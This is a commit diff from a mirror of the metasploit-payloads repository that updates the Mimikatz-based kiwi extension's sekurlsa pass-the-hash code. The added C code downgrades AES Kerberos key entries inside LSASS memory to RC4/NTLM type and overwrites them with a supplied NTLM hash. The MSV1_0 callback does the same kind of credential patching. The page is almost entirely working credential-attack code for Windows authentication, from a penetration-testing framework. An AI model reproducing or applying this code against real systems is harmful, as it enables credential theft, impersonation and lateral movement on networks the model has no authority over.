mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-04-30 13:07:22 +02:00
Update to Mimikatz commit 2cb6326ba2658e0d226d7a341fd6bf3bba2dbceb
This commit is contained in:
OJ
parent
e7974b4707
commit
fed3ebd43f
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages
27
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
27
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
@ -228,8 +228,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
|||||||
DWORD i, nbHash;
|
DWORD i, nbHash;
|
||||||
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
|
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
|
||||||
UNICODE_STRING nullPasswd = { 0, 0, NULL };
|
UNICODE_STRING nullPasswd = { 0, 0, NULL };
|
||||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { ntlmHash, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
|
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { NULL, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
|
||||||
PKERB_HASHPASSWORD_GENERIC pHash;
|
PKERB_HASHPASSWORD_GENERIC pHash;
|
||||||
|
PBYTE baseCheck;
|
||||||
|
SIZE_T offset;
|
||||||
|
|
||||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||||
{
|
{
|
||||||
@ -239,7 +241,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
|||||||
{
|
{
|
||||||
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
||||||
{
|
{
|
||||||
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
RemoteLocalKerbSession.address = baseCheck = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
||||||
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
||||||
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
||||||
{
|
{
|
||||||
@ -249,15 +251,32 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
|||||||
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
|
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
|
||||||
{
|
{
|
||||||
kprintf(L" ");
|
kprintf(L" ");
|
||||||
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
|
offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric;
|
||||||
|
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + offset);
|
||||||
|
|
||||||
|
if ((pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) || (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96))
|
||||||
|
{
|
||||||
|
kprintf(L"-");
|
||||||
|
pHash->Type = KERB_ETYPE_RC4_HMAC_NT;
|
||||||
|
pHash->Size = LM_NTLM_HASH_LENGTH;
|
||||||
|
|
||||||
|
aLocalNTLMMemory.address = pHash;
|
||||||
|
RemoteLocalKerbSession.address = baseCheck + offset;
|
||||||
|
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)))
|
||||||
|
kprintf(L">");
|
||||||
|
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||||
|
}
|
||||||
|
|
||||||
|
aLocalNTLMMemory.address = ntlmHash;
|
||||||
RemoteLocalKerbSession.address = pHash->Checksump;
|
RemoteLocalKerbSession.address = pHash->Checksump;
|
||||||
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||||
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
|
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
|
||||||
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
|
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
|
||||||
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
|
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, min(pHash->Size, LM_NTLM_HASH_LENGTH))) // ok not fair-play with AES-* and old CRC =)
|
||||||
kprintf(L"%u", i + 1);
|
kprintf(L"%u", i + 1);
|
||||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||||
}
|
}
|
||||||
|
|
||||||
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
||||||
{
|
{
|
||||||
kprintf(L" ");
|
kprintf(L" ");
|
||||||
|
|||||||
@ -57,7 +57,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY
|
|||||||
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
||||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||||
|
|
||||||
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
|
kprintf(L"Data copy MSV1_0 @ %p : ", origBufferAddress->address);
|
||||||
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||||
kprintf(L"OK !");
|
kprintf(L"OK !");
|
||||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user